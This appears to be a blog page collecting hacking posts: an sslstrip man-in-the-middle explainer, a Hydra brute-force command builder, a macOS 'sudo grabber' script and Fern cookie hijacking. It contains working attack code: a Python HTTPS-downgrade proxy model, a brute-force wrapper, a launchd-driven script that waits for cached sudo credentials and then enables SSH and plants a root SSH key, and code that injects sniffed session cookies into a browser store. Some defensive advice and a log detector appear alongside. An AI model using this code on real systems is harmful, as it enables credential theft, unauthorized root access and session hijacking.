SSL Man In the Middle Attack

This post looks at how a Man In The Middle (MITM) attack can be carried out against SSL/TLS encrypted traffic. The attack uses sslstrip, written by Moxie Marlinspike, together with an ARP spoofing tool and a packet sniffer. The tools run on UNIX and Linux platforms, so I suggest Dsniff, which provides arpspoof as well as the dsniff sniffer itself. sslstrip was written to demonstrate how an attacker sitting between a victim and a legitimate site can keep the victim on plain HTTP while still talking HTTPS to the site. A related trick, shown by Marlinspike the same year (2009), exploited the mishandling of null characters in certificate names by several CAs and browsers, so that a certificate issued to the attacker was accepted for a legitimate site.

I think it's not good to demonstrate how the attack is performed, since Moxie Marlinspike has already provided a nice tutorial on his own website, with a video.

See the tutorial at thoughtcrime.org.

Here we discuss what goes on behind the attack, that is, why it is possible at all. The following figure shows what happens before your data is encrypted and sent to its destination.

What the figure shows is the TLS handshake. The server presents its certificate; the client checks that the certificate chains up to a CA it already trusts and that the name in it matches the host it asked for; only then does the key exchange take place and the data get encrypted. The CA itself is not contacted during the handshake (apart from optional revocation checks), and the sequence is the same on a LAN as on the Internet. So an attacker who wants to read the traffic has two options: present a certificate the client will wrongly accept (the null-character trick), or, far simpler, make sure the client never starts an HTTPS connection in the first place, which is what sslstrip does.

How does the attacker get into the middle?

1. First, all of the victim's traffic has to pass through the attacker's system.
2. So he/she performs an ARP poisoning attack, telling the victim that the attacker's MAC address belongs to the gateway (for more info on ARP poisoning read the Packet Sniffer section).
3. He/she then enables IP forwarding and redirects the port 80 traffic now flowing through his/her system into sslstrip.
4. From that point on sslstrip sits between the victim and every site the victim visits: it talks HTTPS to the site and plain HTTP to the victim.


What goes on behind the scenes?
When the victim requests a page, sslstrip fetches it from the real site (over HTTPS where the site demands it) and rewrites every https:// link and redirect in the response to http:// before handing it to the victim. The victim's browser therefore never starts a TLS handshake, never sees a certificate and never gets a warning; it sends logins and session cookies in the clear, and the attacker reads them with the packet sniffer. To the site the session looks like ordinary HTTPS; to the victim the page looks as usual, minus the padlock (sslstrip can even substitute a padlock favicon). The null-character certificate is the variant for a victim who insists on HTTPS: a CA that validated only the part after the null issued certificates for names such as www.example.com\0.attacker.example, and a browser that compared the name as a C string stopped at the null and accepted the attacker's certificate as valid for www.example.com.
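The two tricks described above, as an added example that is not from the original post and not sslstrip's own code: a toy model of the response rewriting sslstrip performs on the way to the victim, and of the string comparison that made null-character certificates work. The Stripper class, its method names and the sample response are my own; real sslstrip is a Twisted-based proxy.

```python
"""Added example (not from the original post and not sslstrip's own code):
a toy model of the two tricks discussed above. The Stripper class and its
method names are my own; real sslstrip is a Twisted-based proxy."""
import re

HTTPS_URL = re.compile(r"https://[^\s\"'<>]+", re.IGNORECASE)


class Stripper:
    """Rewrites responses on their way to the victim and remembers which
    (host, path) pairs must be fetched over HTTPS from the real server."""

    def __init__(self):
        self.upgraded = set()

    def _remember(self, url):
        host, _, path = url[len("https://"):].partition("/")
        self.upgraded.add((host.lower(), "/" + path))

    def strip_response(self, headers, body):
        """headers: dict of response headers, body: HTML as str.
        Returns the (headers, body) the victim will see."""
        out = {}
        for name, value in headers.items():
            key = name.lower()
            if key == "location" and value.lower().startswith("https://"):
                # A redirect to HTTPS becomes a redirect to HTTP; we fetch
                # the real thing over HTTPS when the victim follows it.
                self._remember(value)
                value = "http://" + value[len("https://"):]
            elif key == "set-cookie":
                # The victim's browser is on plain HTTP, so a Secure cookie
                # would never be sent back through us: drop the flag.
                value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.IGNORECASE)
            elif key == "strict-transport-security":
                # Browsers ignore HSTS received over plain HTTP anyway; what
                # protects a victim is an HSTS entry stored from an earlier
                # genuine HTTPS visit, which this proxy cannot remove.
                continue
            out[name] = value
        for url in HTTPS_URL.findall(body):
            self._remember(url)
        body = HTTPS_URL.sub(lambda m: "http://" + m.group(0)[len("https://"):], body)
        return out, body

    def upstream_scheme(self, host, path):
        """Scheme to use towards the real server for a request from the victim."""
        return "https" if (host.lower(), path) in self.upgraded else "http"


# The null-character certificate trick: the CA validated ownership of the
# part after the NUL (attacker.example) and issued the whole string as the
# name; a browser that handled the name as a C string stopped at the NUL.
def match_c_string(cert_name, hostname):
    """Buggy comparison: stops at the first NUL byte."""
    return cert_name.split("\x00", 1)[0].lower() == hostname.lower()


def match_exact(cert_name, hostname):
    """Correct comparison over the full, length-delimited name."""
    return cert_name.lower() == hostname.lower()


if __name__ == "__main__":
    s = Stripper()
    hdrs, html = s.strip_response(
        {"Location": "https://example.com/login", "Set-Cookie": "sid=1; Secure; HttpOnly"},
        '<a href="https://example.com/account">My account</a>')   # constructed response
    print(hdrs, html, s.upstream_scheme("example.com", "/login"))
    print(match_c_string("www.example.com\x00.attacker.example", "www.example.com"),
          match_exact("www.example.com\x00.attacker.example", "www.example.com"))
```

The point of `upgraded` is the same bookkeeping sslstrip has to do: once a link has been downgraded, the matching request from the victim must be sent upstream over HTTPS again or the real site will refuse it or redirect back to HTTPS in a loop.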

The best countermeasures I can suggest are on three sides. On the network, run ARP spoofing detection (arpwatch, for example) and anti-sniffing tools, or pin the gateway with a static ARP entry. On the client, check that the address bar really shows https:// with a valid certificate before typing a password, and never trust a connection made from a LAN you do not control (hotel, conference, open Wi-Fi). On the server, HTTP Strict Transport Security (HSTS) and the Secure flag on session cookies make sure a browser that has seen the site once over HTTPS is not downgraded to plain HTTP on a later visit.

Hydra bruteforce and dictionary attack script


This is my first script - HidraShok

It is a script to make password attacks a lot easier for people. It can do either bruteforcing or dictionary attacks.

I spent all morning learning how to code this and I wanted to share it with everyone. I couldn't find a section in the forums for scripts, but I noticed there were a lot of scripts in this section so I chose to post here (please move if it is the wrong section).

version 0.1
It can do a dictionary attack
It can bruteforce
It can use a single username or a list of usernames
You can choose how many tasks to run simultaneously
You can choose the timeout time
You can choose the webpage to attack


version 0.2
Fixed a problem in the if statement that executed the final command to run hydra. It was stopping the script working if you had picked password option 1 or 2.
New issue: when choosing the option to use text files, the script turns the ' into /, so it messes up the script. Looking for a fix, does anyone know one?




Things I want to do
Add in error detection in case the user enters wrong info
More options to define the attack
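As an added example (not the HidraShok script from the post, which is not shown), here is how the same options can be turned into a hydra command line without any shell quoting problems: the command is built as an argument list and handed to hydra directly, so a ' in the form spec never reaches a shell. The flags are hydra's own (-l/-L, -P, -x, -t, -w, -s and the http-post-form module spec "path:POST body:F=failure text"); the wrapper names, the target and the sample values are mine.

```python
"""Added example, not the HidraShok script from the post: build the hydra
command line as an argument list and hand it straight to hydra, so the shell
never gets to mangle quotes. The flags are hydra's own; the wrapper names and
the sample values are mine."""
import shlex
import subprocess


def build_hydra_cmd(target, form, fail_string, *, user=None, user_list=None,
                    wordlist=None, brute=None, tasks=16, timeout=30,
                    port=None, hydra="hydra"):
    """Return argv for one hydra run against an HTTP POST login form.

    form:        request path and POST body with ^USER^ / ^PASS^ placeholders,
                 e.g. "/login.php:user=^USER^&pass=^PASS^"
    fail_string: text that appears in the response when a login failed
    user / user_list:  a single login name or a file of names (-l / -L)
    wordlist / brute:  a dictionary file (-P) or a hydra -x spec "min:max:charset"
    tasks / timeout:   parallel connections (-t) and response wait time (-w)
    """
    if (user is None) == (user_list is None):
        raise ValueError("give exactly one of user or user_list")
    if (wordlist is None) == (brute is None):
        raise ValueError("give exactly one of wordlist (dictionary) or brute (-x spec)")
    cmd = [hydra]
    cmd += ["-l", user] if user is not None else ["-L", user_list]
    cmd += ["-P", wordlist] if wordlist is not None else ["-x", brute]
    cmd += ["-t", str(tasks), "-w", str(timeout)]
    if port is not None:
        cmd += ["-s", str(port)]
    # Module spec: path:POST body:F=<failure marker>. It contains ':', '&'
    # and '^', but as a single argv element it needs no quoting at all.
    cmd += [target, "http-post-form", f"{form}:F={fail_string}"]
    return cmd


def run(cmd, dry_run=True):
    """With dry_run, return the command as a correctly quoted shell line
    (what you would paste into a terminal); otherwise execute it."""
    if dry_run:
        return shlex.join(cmd)
    return subprocess.run(cmd, check=False).returncode


if __name__ == "__main__":
    cmd = build_hydra_cmd("10.0.0.5", "/login.php:user=^USER^&pass=^PASS^",
                          "Login failed", user="admin", wordlist="rockyou.txt",
                          tasks=8, timeout=20)
    print(run(cmd))            # dry run: prints the quoted command line
```

Pass `dry_run=False` to actually start hydra; the quoted line from the dry run is what you would have had to get right by hand in a shell script, and it is where a stray ' in the form spec breaks a script that builds the command as one string.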

Stealing SUDO Privs


Some of you may remember we were talking about stealing sudo privs from logged-in users some time ago. I'd noticed behaviour on an older Red Hat distro which granted sudo to a user even if the credential wasn't created by the same session.

Recently a coworker and I have started being childish - whenever someone leaves a machine unlocked, the other changes a background to something not-quite-completely-offensive. As part of that, I decided it was necessary to steal root privileges on the machine, strictly for amusement purposes.

This script is written for a Mac OS X Mountain Lion machine; it also works under Lion. It is ridiculously noisy, generating stacks of log entries every few minutes while it waits in the background trying to steal sudo privileges. There are quieter alternatives: you could tail the shell history file until sudo is run, for example.

The window it exploits is sudo's credential cache: after a successful password entry, sudo does not ask again for timestamp_timeout minutes (5 by default), and unless tty_tickets is in effect that cached credential is honoured from any of the user's processes, including a background job with no terminal. Regardless, if you have a copy of sudo that accepts the -n (non-interactive) switch, you should be able to make it work.

#!/bin/sh
# Ask sudo non-interactively (-n) whether a cached credential exists for this
# user. If sudo has been used from any session in the last timestamp_timeout
# minutes this succeeds silently; otherwise it fails, and logs the attempt.
sudo -n id -u > /dev/null 2>&1
if [ $? -eq 0 ];
then
    (
    # We are root for the moment: enable SSH, remove the group that restricts
    # who may log in over SSH, and install our public key for root.
    # The redirect into /tmp is done by the unprivileged shell, which is why
    # the key file is written there first and then moved into place as root.
    sudo systemsetup -setremotelogin on
    sudo dscl localhost -delete /Local/Default/Groups/com.apple.access_ssh
    sudo mkdir -p /var/root/.ssh && \
    sudo chmod 0700 /var/root/.ssh && \
    sudo chown root:wheel /var/root/.ssh && \
    sudo perl -e 'print qq|SSH KEY HERE|;' > /tmp/authorized_keys && \
    sudo mv /tmp/authorized_keys /var/root/.ssh/authorized_keys && \
    sudo chmod 0600 /var/root/.ssh/authorized_keys && \
    sudo chown root:wheel /var/root/.ssh/authorized_keys
    ) > /dev/null 2>&1
fi

I have it wrapped into a launch daemon:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
    <dict>
    <key>Label</key>
    <string>com.dracyrys.sudograbber</string>
    <key>ProgramArguments</key>
    <array>
    <string>/bin/sh</string>
    <string>/Users/admin/.script/grab.sudo.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>300</integer>
    </dict>
</plist>



There are a number of viable options for using this sort of access - in this case I have started SSH and granted root the ability to login with an ssh key.

As always, I'm not supporting the code, merely pointing out that it works in a very new operating environment. sudo on Mountain Lion is 1.7.4p6.

Hopefully you find it interesting, and it helps escalate your privs next time all else has failed you.
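The noise the grabber leaves behind is also what gives it away. As an added example (not part of the original post), here is a small detector that reads sudo's syslog entries and flags a user whose sudo attempts recur at a fixed interval with no terminal attached, then lists what that user got root to run without a terminal. sudo's log format ("user : [message ;] TTY=... ; PWD=... ; USER=... ; COMMAND=...", with TTY=unknown for a process that has no terminal) is real; the host name, user, times and the failure message in the sample lines are constructed.

```python
"""Added example, not part of the original post: a detector for the noise
the sudo grabber leaves in the system log. The sample lines are constructed
in sudo's log format; host, user, times and the failure text are made up."""
import re
from datetime import datetime

SAMPLE_LOG = """\
Jan 14 09:00:01 macbook sudo[801]:    admin : a password is required ; TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id -u
Jan 14 09:05:01 macbook sudo[812]:    admin : a password is required ; TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id -u
Jan 14 09:07:43 macbook sudo[830]:    admin : TTY=ttys001 ; PWD=/Users/admin ; USER=root ; COMMAND=/usr/sbin/softwareupdate -l
Jan 14 09:10:01 macbook sudo[845]:    admin : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id -u
Jan 14 09:10:01 macbook sudo[846]:    admin : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/systemsetup -setremotelogin on
"""

LINE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sudo\[\d+\]:\s+"
                  r"(?P<user>\S+) : (?P<rest>.*)$")
KEYS = ("TTY", "PWD", "USER", "COMMAND")


def parse(line, year=2013):
    """One syslog line -> dict with ts, user, msg (None when sudo succeeded)
    and the TTY/PWD/USER/COMMAND fields; None for lines that are not sudo's."""
    m = LINE.match(line)
    if not m:
        return None
    rec = {"ts": datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"),
           "user": m["user"], "msg": None}
    for part in m["rest"].split(" ; "):
        key, sep, val = part.partition("=")
        if sep and key in KEYS:
            rec[key] = val
        else:
            rec["msg"] = part   # free text before the fields: only present on failure
    return rec


def find_sudo_pollers(log, min_hits=3, tolerance=5):
    """(user, command, period_seconds) for every no-tty sudo invocation that
    recurs at a steady interval, like a launchd job polling `sudo -n`."""
    seen = {}
    for line in log.splitlines():
        rec = parse(line)
        if rec and rec.get("TTY") == "unknown":
            seen.setdefault((rec["user"], rec["COMMAND"]), []).append(rec["ts"])
    hits = []
    for (user, cmd), stamps in seen.items():
        if len(stamps) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if max(gaps) - min(gaps) <= tolerance:
            hits.append((user, cmd, round(sum(gaps) / len(gaps))))
    return hits


def root_commands_without_tty(log, user):
    """Commands the user got sudo to run with no terminal and no error: what
    the grabber actually did once it found a cached credential."""
    return [r["COMMAND"] for r in map(parse, log.splitlines())
            if r and r["user"] == user and r.get("TTY") == "unknown" and r["msg"] is None]


if __name__ == "__main__":
    for user, cmd, period in find_sudo_pollers(SAMPLE_LOG):
        print(f"{user} polls sudo every {period}s with: {cmd}")
        print("ran as root without a tty:", root_commands_without_tty(SAMPLE_LOG, user))
```

Run it over /var/log/system.log (or the output of `log show` on newer systems) instead of SAMPLE_LOG; the 300-second period matches the StartInterval in the launchd plist above, and the interactive sudo from ttys001 in between is the victim's own command that primed the cache.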

Session Hijacking with Fern Wifi Cracker

Fern Cookie Hijacker is a new feature added in Fern Wifi Cracker 1.45. It is a wifi-based session hijacking tool that clones remote web sessions by sniffing and capturing cookie packets from other hosts on any wireless network within reach. It can decrypt WEP-encrypted packets on the fly to process session cookies transmitted over the air.

Fern Cookie Hijacker comes with an integrated detection engine to spot and intercept cookie packets. Unlike some cookie detection engines, it does not wait to collect the complete cookie exchange during the initial authentication; it pulls cookies out as they are transmitted over the wireless link, associates them with their hosts, and forges plausible values for fields that were not captured (e.g. expiry, isSecure).

Here's a video that demonstrates how it works:


Firefox's cookie store, the SQLite database cookies.sqlite, is no easy thing to talk to. Many language bindings fail to open it because the SQLite library bundled with Firefox is updated regularly, and a file written by a newer library (one that uses a newer file format feature, for instance) cannot be read by the older library linked into the binding, which leaves the binding useless after each update.
Opening such a database returns the misleading error "file is encrypted or is not a database". So I searched the internet for a reliable API but could not find one, and wrote this generic API by reverse engineering Firefox with IDA Pro and OllyDBG. This platform-independent API talks to Firefox's SQLite databases by loading Firefox's own SQLite library (libmozsqlite3.so or mozsqlite3.dll) and calling into it. Using that library rather than Python's sqlite3 module matters because, as said, the bundled library moves on with every Firefox release, and this API keeps working with the cookie database whatever changes Firefox makes to it.
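Two pieces of the above, as an added example that is not Fern's cookie_core.py: a check of the SQLite file header that tells you why a binding refuses a cookies.sqlite file (which library last wrote it, and whether it is in WAL mode, a format a pre-3.7.0 library rejects with exactly that "file is encrypted or is not a database" error), and the step of turning a cookie sniffed off the wire into a row of a moz_cookies-style table, forging expiry and isSecure where the Set-Cookie header did not carry them. The table is my reduced copy of the columns Firefox's moz_cookies had (host, name, value, path, expiry, lastAccessed, isSecure, isHttpOnly), not the real schema, and the cookies are made up.

```python
"""Added example, not Fern's cookie_core.py: (1) an SQLite header check that
explains the 'file is encrypted or is not a database' error, and (2) turning a
sniffed Set-Cookie header into a row of a moz_cookies-style table. The table
is my reduced copy of Firefox's columns, not the real schema; cookies are made up."""
import os
import sqlite3
import struct
import tempfile
import time
from email.utils import parsedate_to_datetime
from http.cookies import SimpleCookie

SCHEMA = """CREATE TABLE IF NOT EXISTS moz_cookies (
    id INTEGER PRIMARY KEY, host TEXT, name TEXT, value TEXT, path TEXT,
    expiry INTEGER, lastAccessed INTEGER, isSecure INTEGER, isHttpOnly INTEGER)"""


def sqlite_header_info(path):
    """Read the 100-byte SQLite file header: magic, file format version
    (2 = WAL mode, needs SQLite >= 3.7.0) and the version of the library that
    last wrote the file, compared with the library behind this interpreter."""
    with open(path, "rb") as f:
        hdr = f.read(100)
    if hdr[:16] != b"SQLite format 3\x00":
        return {"sqlite": False}
    n = struct.unpack(">I", hdr[96:100])[0]        # SQLITE_VERSION_NUMBER of the writer
    written_by = f"{n // 1000000}.{n // 1000 % 1000}.{n % 1000}"
    return {"sqlite": True, "wal": hdr[18] == 2, "written_by": written_by,
            "reader": sqlite3.sqlite_version}


def new_cookie_db_file():
    """Create an empty cookie store on disk and return its path."""
    fd, path = tempfile.mkstemp(suffix=".sqlite")
    os.close(fd)
    conn = sqlite3.connect(path)
    conn.execute(SCHEMA)
    conn.commit()
    conn.close()
    return path


def _expiry(morsel, now):
    if morsel["max-age"]:
        return now + int(morsel["max-age"])
    if morsel["expires"]:
        return int(parsedate_to_datetime(morsel["expires"]).timestamp())
    return None


def sniffed_cookie_rows(host, set_cookie, now=None, default_ttl=30 * 24 * 3600):
    """One Set-Cookie header seen in a response from `host` -> moz_cookies rows."""
    now = int(time.time() if now is None else now)
    jar = SimpleCookie()
    jar.load(set_cookie)
    rows = []
    for name, morsel in jar.items():
        rows.append({
            "host": morsel["domain"] or host,
            "name": name, "value": morsel.value,
            "path": morsel["path"] or "/",
            # A session cookie carries no expiry; forge one far enough ahead
            # for the cloned session to stay usable.
            "expiry": _expiry(morsel, now) or now + default_ttl,
            "lastAccessed": now * 1_000_000,          # Firefox stores microseconds
            # It was captured from plain HTTP, so it was not a Secure cookie; a
            # forged Secure flag would only stop the browser sending it.
            "isSecure": 0,
            "isHttpOnly": int(bool(morsel["httponly"])),
        })
    return rows


def inject(path, rows):
    """Insert the rows and return the number of cookies now in the store."""
    conn = sqlite3.connect(path)
    with conn:
        conn.executemany(
            "INSERT INTO moz_cookies (host, name, value, path, expiry, lastAccessed,"
            " isSecure, isHttpOnly) VALUES (:host, :name, :value, :path, :expiry,"
            " :lastAccessed, :isSecure, :isHttpOnly)", rows)
    count = conn.execute("SELECT COUNT(*) FROM moz_cookies").fetchone()[0]
    conn.close()
    return count


if __name__ == "__main__":
    db = new_cookie_db_file()
    print(sqlite_header_info(db))
    rows = sniffed_cookie_rows("www.example.com", "sid=abc123; Path=/account; HttpOnly")
    print(inject(db, rows), "cookie(s) in", db)
```

Before blaming a binding, run `sqlite_header_info` on the real cookies.sqlite: if `written_by` is newer than `reader`, or `wal` is set and the reader predates 3.7.0, the fix is a newer SQLite behind the binding (or, as Fern does, Firefox's own library), not a different parser.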

API Link:


http://code.google.com/p/fern-wifi-c...cookie_core.py

THIS VIDEO AND SOFTWARE PROGRAM ARE FOR EDUCATIONAL PURPOSES (MITIGATION) ONLY. TESTING IT ON NETWORKS YOU ARE NOT AUTHORIZED TO TEST IS ILLEGAL.

 

Be Huge © 2012 | Template By Be Huge